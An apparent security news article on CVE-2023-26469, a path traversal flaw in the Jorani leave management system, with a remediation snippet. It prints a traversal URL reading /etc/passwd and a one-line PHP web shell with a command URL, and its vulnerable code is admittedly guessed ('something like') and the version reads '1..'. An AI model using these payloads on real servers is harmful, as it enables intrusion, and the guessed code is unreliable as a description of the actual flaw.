CVE CyberSecurity Database News

CVE-2023-26469 - Path Traversal & Remote Code Execution in Jorani 1..

Poster -

In early 2023, researchers discovered a critical vulnerability—CVE-2023-26469—in Jorani 1.., a popular open-source leave management system. This flaw allows attackers to use path traversal to read sensitive files or, in some cases, even run malicious code on the server. In this article, we’ll break down what this means, how the exploit works, and provide annotated code snippets to help you understand the details.

What is Path Traversal?

Path traversal is a security issue where improper input validation allows attackers to access directories and files outside the intended path. For instance, by submitting ../../../etc/passwd as input, an attacker may retrieve the system password file on a Unix server.

How Jorani 1.. is Vulnerable

Jorani offers file handling features—like uploading and downloading attachments—that do not properly sanitize user-supplied file paths. When a user requests a file, the system concatenates user input into a file path without enough restrictions, letting attackers traverse directories.

Suppose the code for file download looks like this

// In Jorani 1.., something like:
$attachment = $_GET['file'];
$file_path = "/var/www/jorani/uploads/" . $attachment;

if (file_exists($file_path)) {
    readfile($file_path);
}

Here, $_GET['file'] is directly used, so sending ?file=../../../../etc/passwd could read the server’s password file!

Manipulate the File Parameter

- Input ../../../../etc/passwd or another sensitive path in the file parameter of the URL.

`

https://victim.com/jorani/index.php/download/file?file=../../../../etc/passwd

`

- If successful, the server returns the contents of /etc/passwd.

If file uploads are enabled and not restricted, an attacker can upload a PHP file like shell.php.

- Then, using path traversal, access and execute /var/www/jorani/uploads/shell.php.

Create a file called shell.php

<?php system($_GET['cmd']); ?>

Upload this via the application, then access it with

https://victim.com/jorani/uploads/shell.php?cmd=whoami

Now the attacker can run arbitrary commands on the server.

Impact

- Sensitive Data Exposure: Attackers can read any file readable by the Jorani web server, such as database credentials or configuration files.
- Remote Code Execution: Malicious PHP files can be uploaded and executed, giving full control to an attacker.

Remediation

If you use Jorani 1.., update to the latest version immediately. Patch notes and updated versions are available on:

- Jorani GitHub Releases
- Official CVE Report
- Full Disclosure – Exploit DB *(if available)*

Here’s one way to prevent path traversal in PHP

$filename = basename($_GET['file']); // Removes path traversal
$file_path = "/var/www/jorani/uploads/" . $filename;

References

- CVE-2023-26469 Summary
- Jorani Project on GitHub
- OWASP Path Traversal Cheat Sheet

Conclusion

*CVE-2023-26469 is a serious vulnerability affecting Jorani 1.., letting attackers read files and even run code on your server.* If you’re still using this version, patch it now. Always sanitize input and follow secure coding practices.

Timeline

Published on: 08/17/2023 19:15:00 UTC
Last modified on: 08/23/2023 16:00:00 UTC